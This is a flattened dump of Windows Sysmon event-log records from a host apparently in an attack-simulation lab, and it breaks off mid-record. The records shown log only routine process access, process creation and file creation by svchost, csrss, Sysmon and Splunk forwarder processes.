12:21:47.414{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439694Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:47.414{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439693Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:47.414{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439692Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:47.414{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439691Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:47.414{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439690Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:47.413{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439689Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:47.413{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439688Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:47.413{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439687Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:47.413{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439686Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:47.413{42DC5269-CE96-6086-0500-00000000BA01}412428C:\Windows\system32\csrss.exe{42DC5269-01DB-6088-AE28-00000000BA01}3396C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000439685Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:47.413{42DC5269-CF3C-6086-AA00-00000000BA01}41684996C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{42DC5269-01DB-6088-AE28-00000000BA01}3396C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000439684Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:47.412{42DC5269-01DB-6088-AE28-00000000BA01}3396C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{42DC5269-CE97-6086-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{42DC5269-CF3C-6086-AA00-00000000BA01}4168C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000439683Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:47.397{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1CDBDFD3ED0765E323BDEB307F6D359D,SHA256=8D3EDBC49148770F297F7F695C5F5DD858B5C4BAD163818C04AC1DEDA8AD1838,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000439682Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:47.379{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=60CF791308623260BA619ED1A7E3C1B1,SHA256=70C1E6AE910A41DD6682F9E11E2E37347DBFE18D0DAE9C4B68505D70091CA56B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000439681Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:47.057{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439680Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:47.057{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439728Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:48.748{42DC5269-CF3C-6086-AE00-00000000BA01}21884056C:\Windows\system32\conhost.exe{42DC5269-01DC-6088-B028-00000000BA01}4188C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439727Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:48.747{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439726Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:48.747{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439725Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:48.747{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439724Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:48.747{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439723Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:48.747{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439722Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:48.747{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439721Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:48.747{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439720Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:48.746{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439719Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:48.746{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439718Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:48.746{42DC5269-CE96-6086-0500-00000000BA01}412528C:\Windows\system32\csrss.exe{42DC5269-01DC-6088-B028-00000000BA01}4188C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000439717Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:48.746{42DC5269-CF3C-6086-AA00-00000000BA01}41684996C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{42DC5269-01DC-6088-B028-00000000BA01}4188C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 